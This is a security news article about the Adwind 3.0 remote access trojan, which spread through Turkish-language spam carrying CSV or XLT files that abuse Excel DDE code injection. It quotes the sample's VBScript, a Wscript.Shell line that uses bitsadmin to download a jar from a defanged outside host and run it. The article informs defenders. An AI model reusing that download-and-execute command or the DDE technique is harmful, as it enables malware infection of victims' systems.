Wednesday, January 1, 2025
HomeCyber Security NewsNew Adwind RAT Attack Linux, Windows and Mac via DDE Code Injection...

New Adwind RAT Attack Linux, Windows and Mac via DDE Code Injection Technique by Evading Antivirus Software

Published on

SIEM as a Service

New Adwind 3.0 RAT (Remote access Trojan) Evolving with new sophisticated capabilities, unlike old version it mainly attacks desktop version of  Linux, Windows and Mac OSX using DDE code injection technique.

Attackers are using weaponized Microsoft Office documents to compromise the targeted victims and also new capabilities that able to avoid detection by anti-virus software.

This attack mainly targeting Turkey and Germany via malicious spam email campaign which is started on Aug. 26, 2018, peaking on Aug. 28.

- Advertisement - SIEM as a Service

Previous version Adwind Widely spreading via A360 Cloud Drive Platform Abuse for Delivering Remote Access Trojans and used as a Malware Distributing Platform by using a File-sharing site to host Malware.

Another scenario Cross-platform Remote Access Trojan “Adwind” Steal Credentials, Record and Harvest keystrokes the Aerospace Industries Data.

Adwind 3.0 RAT can able to, log keystroke, take screenshots, take pictures or transfer files execute any kind of commands on its victims.

Adwind 3.0 RAT Code Injection Technique Scenario 

An initial stage of attack starts with the malicious spam emails with the body content written in the Turkish language along with an attachment of either CSV file or.XLT file.

Both campaign opened by Microsoft Excel by default and both files are capable of performing DDE code injection attack.

In this case, malicious dropper has the various malicious format in below list and note that all the extension will be opened by default in Microsoft Excel Document but non-default extensions, a script starting Excel with a file with one of these extensions as a parameter is still a viable attack scenario.

Once the victims will open the Excel file then it will display warnings to the user regarding the execution of code and it warned the user executing the different file format and the file will probably be corrupted if you’re open the file.

Another warning will displays that the document will execute the application “CMD.exe.” and once the user accepts the warnings, the system will open the calculator application.

The main purpose of the code injection technique used by attackers to create and execute a VBScript in specific content.

Set WXWYKNRG = CreateObject("Wscript.Shell")
WXWYKNRG.Run "cmd /c bitsadmin /transfer 8 /download hxxp://erayinsaat[.]live
%temp%\NMUWYTGO.jar&%temp%\NMUWYTGO.jar",0,True

Later it drops the final payload which is a is a Java archive file and the attacker packed this java payload using  “Allatori Obfuscator “ and the further research confirms that the packed malware as Adwind RAT v3.0.

According to Cisco Talos research, It’s a well-known multiplatform RAT with several configurations possible. The samples we tested were configured to achieve persistence on Windows, Linux and Mac OSX. Each platform has its own persistence name.

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

DrayTek Devices Vulnerability Let Attackers Arbitrary Commands Remotely

The DrayTek Gateway devices, more specifically the Vigor2960 and Vigor300B models, are susceptible to...

New Stealthy Malware Leveraging SSH Over TOR Attacking Ukrainian Military

Researchers recently discovered a malicious campaign targeting Ukrainian military personnel through fake "Army+" application...

CISA Warns of Palo Alto Networks PAN-OS Vulnerability Exploited in Wild

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a high-priority alert on...

US Treasury Department Breach, Hackers Accessed Workstations

The Biden administration confirmed that a Chinese state-sponsored hacking group breached the U.S. Treasury...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

DrayTek Devices Vulnerability Let Attackers Arbitrary Commands Remotely

The DrayTek Gateway devices, more specifically the Vigor2960 and Vigor300B models, are susceptible to...

New Stealthy Malware Leveraging SSH Over TOR Attacking Ukrainian Military

Researchers recently discovered a malicious campaign targeting Ukrainian military personnel through fake "Army+" application...

CISA Warns of Palo Alto Networks PAN-OS Vulnerability Exploited in Wild

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a high-priority alert on...